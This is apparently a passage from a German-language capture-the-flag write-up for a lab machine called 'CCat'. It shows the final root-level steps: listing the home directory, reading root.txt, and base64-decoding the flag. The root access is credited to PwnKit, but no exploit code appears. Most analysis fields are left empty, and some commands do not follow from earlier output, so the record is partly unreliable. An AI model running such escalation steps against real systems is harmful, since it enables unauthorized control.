uid=0(root) gid=0(root) groups=0(root),33(www-data)

Technische Analyse: Wir sind jetzt als `root` angemeldet.

Kontextbezogene Bewertung:

Handlungsorientierte Empfehlungen: Für den Pentester: Jetzt können wir Root befehle ausführen Für den Systemadministrator: Schnell das System patchen

┌──(root㉿CCat)-[~]
└─# cd ~
---

Technische Analyse:

Kontextbezogene Bewertung:

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# ls
pth-toolkit-master root.txt snap

Technische Analyse:Auflistung des Root Verzeichnisses

Kontextbezogene Bewertung: Die root.txt ist im Root Verzeichnis

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# cat root.txt
______ ___________ __ ____ __ __ _______
/ ______|| ___________ \ / \ / / \ __| | | | | _______ \
| ,-'| __ __\/ __\/ | '| __ __ \ __/ | | \ | |. --.| |
| | | __ |> < | | | | __ | | < |
| `-.| |____ | ____/ \ / | `-.| | . \ | | | '--' |
\_____||_______| \__/ \__/ |_______||__|\__\ |__| |_______/

.______ . ___ ___ ___ __ __ ________ ____ __ ____ ______
| _ \ | \/ | \ \ / | | | | / \ \/
| |_) | | \ / | \ V / | | | `/ / \ | | |______|
| | | |> < | | | |
| |\-.| | | | | | | --| |
| _| `._____||__| |__| /__/ \__/ |__| |__| /________|

RmxhZwo=

Technische Analyse: Anzeige der root.txt

Kontextbezogene Bewertung: Enthält den verschlüsselten Key

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# cat ./zerocewl/note.txt
Did you publish the About page?

Technische Analyse:Anzeige der note.txt

Kontextbezogene Bewertung:

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

┌──(root㉿CCat)-[~]
└─# echo RmxhZwo= | base64 -d
Flag

Technische Analyse: Decodieren der Flagge

Kontextbezogene Bewertung: Decodierte Root-Flagge

Handlungsorientierte Empfehlungen: Für den Pentester: Für den Systemadministrator:

Proof of Concept: Erfolgreiche Root-Privilegienerlangung durch PwnKit

┌──(root㉿CCat)-[~]
└─# Privilege Escalation erfolgreich

Flags

┌──(root㉿CCat)-[~]
└─# root.txt
RmxhZwo=